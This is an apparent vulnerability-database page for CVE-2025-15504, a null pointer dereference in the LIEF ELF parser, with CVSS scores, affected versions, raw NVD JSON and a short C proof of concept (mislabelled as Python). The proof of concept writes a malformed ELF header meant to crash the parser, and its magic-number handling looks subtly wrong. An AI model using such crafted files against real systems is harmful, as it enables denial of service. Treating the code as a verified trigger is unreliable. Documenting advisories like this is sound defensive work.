Security Vulnerability Report
中文
CVE-2025-15504 CVSS 3.3 LOW

CVE-2025-15504

Published: 2026-01-10 12:15:50
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A security flaw has been discovered in lief-project LIEF up to 0.17.1. Affected by this issue is the function Parser::parse_binary of the file src/ELF/Parser.tcc of the component ELF Binary Parser. The manipulation results in null pointer dereference. The attack must be initiated from a local position. The exploit has been released to the public and may be used for attacks. Upgrading to version 0.17.2 can resolve this issue. The patch is identified as 81bd5d7ea0c390563f1c4c017c9019d154802978. It is recommended to upgrade the affected component.

CVSS Details

CVSS Score
3.3
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:lief-project:lief:*:*:*:*:*:*:*:* - VULNERABLE
lief-project/LIEF <= 0.17.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC for CVE-2025-15504: Null Pointer Dereference in LIEF ELF Parser // This PoC creates a malformed ELF file that triggers the vulnerability #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> // ELF magic number #define ELF_MAGIC 0x7F454C46 // ELF header structure (simplified) typedef struct { uint32_t e_ident_magic; uint8_t e_ident_class; uint8_t e_ident_data; uint8_t e_ident_version; uint8_t e_ident_osabi; uint8_t e_ident_abiversioin; uint16_t e_type; uint16_t e_machine; uint32_t e_version; uint64_t e_entry; uint64_t e_phoff; uint64_t e_shoff; uint32_t e_flags; uint16_t e_ehsize; uint16_t e_phentsize; uint16_t e_phnum; uint16_t e_shentsize; uint16_t e_shnum; uint16_t e_shstrndx; } Elf64_Ehdr; void create_malformed_elf(const char* filename) { FILE* fp = fopen(filename, "wb"); if (!fp) { printf("Failed to create file\n"); return; } Elf64_Ehdr ehdr = {0}; // Set ELF magic number ehdr.e_ident_magic = ELF_MAGIC; ehdr.e_ident_class = 2; // 64-bit ehdr.e_ident_data = 1; // Little endian ehdr.e_ident_version = 1; ehdr.e_ident_osabi = 0; // Set specific values to trigger the vulnerability ehdr.e_type = 2; // ET_EXEC ehdr.e_machine = 62; // EM_X86_64 ehdr.e_version = 1; // Set section header table values that may cause null pointer dereference ehdr.e_shoff = 0x1000; // Section header table offset ehdr.e_shnum = 0xFFFF; // Large number of sections ehdr.e_shentsize = 64; ehdr.e_shstrndx = 0xFFFE; // Invalid string table index // Write malformed ELF header fwrite(&ehdr, sizeof(Elf64_Ehdr), 1, fp); fclose(fp); printf("Malformed ELF file created: %s\n", filename); } int main() { const char* poc_file = "poc_cve_2025_15504.elf"; create_malformed_elf(poc_file); printf("\nUsage: Parse this file with vulnerable LIEF version\n"); printf("The malformed ELF header will trigger null pointer dereference\n"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15504", "sourceIdentifier": "[email protected]", "published": "2026-01-10T12:15:49.570", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in lief-project LIEF up to 0.17.1. Affected by this issue is the function Parser::parse_binary of the file src/ELF/Parser.tcc of the component ELF Binary Parser. The manipulation results in null pointer dereference. The attack must be initiated from a local position. The exploit has been released to the public and may be used for attacks. Upgrading to version 0.17.2 can resolve this issue. The patch is identified as 81bd5d7ea0c390563f1c4c017c9019d154802978. It is recommended to upgrade the affected component."}, {"lang": "es", "value": "Se ha descubierto una falla de seguridad en lief-project LIEF hasta la versión 0.17.1. Afectada por este problema es la función Parser::parse_binary del archivo src/ELF/Parser.tcc del componente ELF Binary Parser. La manipulación resulta en una desreferencia de puntero nulo. El ataque debe ser iniciado desde una posición local. El exploit ha sido liberado al público y puede ser usado para ataques. Actualizar a la versión 0.17.2 puede resolver este problema. El parche se identifica como 81bd5d7ea0c390563f1c4c017c9019d154802978. Se recomienda actualizar el componente afectado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 1.7, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-404"}, {"lang": "en", "value": "CWE-476"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lief-project:lief:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.17.2", "matchCriteriaId": "12403F70-1557-4C0C-B200-9C4ECFBEE7C3"}]}]}], "references": [{"url": "https://github.com/lief-project ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.